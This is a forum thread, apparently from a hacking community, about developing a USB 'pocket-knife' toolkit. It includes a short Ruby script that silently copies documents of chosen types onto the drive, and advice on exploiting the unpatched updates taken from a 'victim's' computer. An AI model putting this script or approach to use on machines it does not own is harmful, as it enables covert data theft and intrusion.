USB Pocket-Knife Development

Leapo

i like ruby tooo.... im looking for source code too... that way it can be expanded on as well.

If you are looking for the source code to slurp.rb, here it is:

# slurp.rb (by elmer) - a simple Ruby script to recursively copy files with certain extensions (as defined in slurp.yaml) to a certain directory (also defined in slurp.yaml)
require 'fileutils'
require 'yaml'
if File.exist?('slurp.yaml') == false
  config = {'dest'=>'./slurp', 'ftype'=>['*.txt', '*.doc']}
  open('slurp.yaml','w+') {|f| YAML.dump(config, f)}
end
load=YAML::load_file('slurp.yaml')
if File.exist?(load['dest']) == false
  Dir.mkdir(load['dest'])
end
load['ftype'].each do |w|
  FileUtils.cp(Dir.glob("**/#{w}"),load['dest'])
end

• Replies 818
  • Created
  • Last Reply

Top Posters In This Topic

Top Posters In This Topic

Posted Images

Im kind of a n00b and I didn't read all the threads so someone might have already asked this but is it possible for there to be a metasploit module in Pocket Knife? like, it could get the system info analyze it and come up with a list of possible exploits. Then u could exploit that computer when u get home. pls reply if this would be possible. Im not much of a programmer. I hardly know C++ so i might not be of much help.

Im kind of a n00b and I didn't read all the threads so someone might have already asked this but is it possible for there to be a metasploit module in Pocket Knife? like, it could get the system info analyze it and come up with a list of possible exploits. Then u could exploit that computer when u get home. pls reply if this would be possible. Im not much of a programmer. I hardly know C++ so i might not be of much help.

Pocket knife extracts a list of updates of the system, you can test them at home and search for any vulnerability.

How would i test the updates to see if they are vulnerable?

You must have a proof system with all updates available installed. Then see the differences between your updates and the updates extracted from the victim's pc, then you can exploit the non-installed patches as alexthedrifter says... googleing.

Obviously Leapo has decided that he doesnt want to work on this anymore, and it is now someone eleses turn to step up and take the torch. All the information is included in your download, just take the time to read and understand how it works, not just running an installer, and do something with it.

I think we can improve the payload a bit more... But I'll wait for Leapo's taking the torch a few time more. Theese days are complicated for someone that is studiying...

If he pass the torch, I'll be very glad to continue it with some of the community support. If he doesn't, I'll be very glad to help in the progress and improve of it. Both cases, this project will continue....

Since Leapos is not replying he might come back he might not, but untill then I think I'll carry the torch. DMilton if you would be so kind to help, msg me on MSN: Alex@normalms.com. So far I'm almost done some additions to it.

I think the project must be continued and If alexthedrifter carries the torch I'll be glad of helping a bit with cleaning code, digging for some other interesting things and with other community contributions or ideas.

But it must be in other post and I have a further question, is anybody else interested in working on it?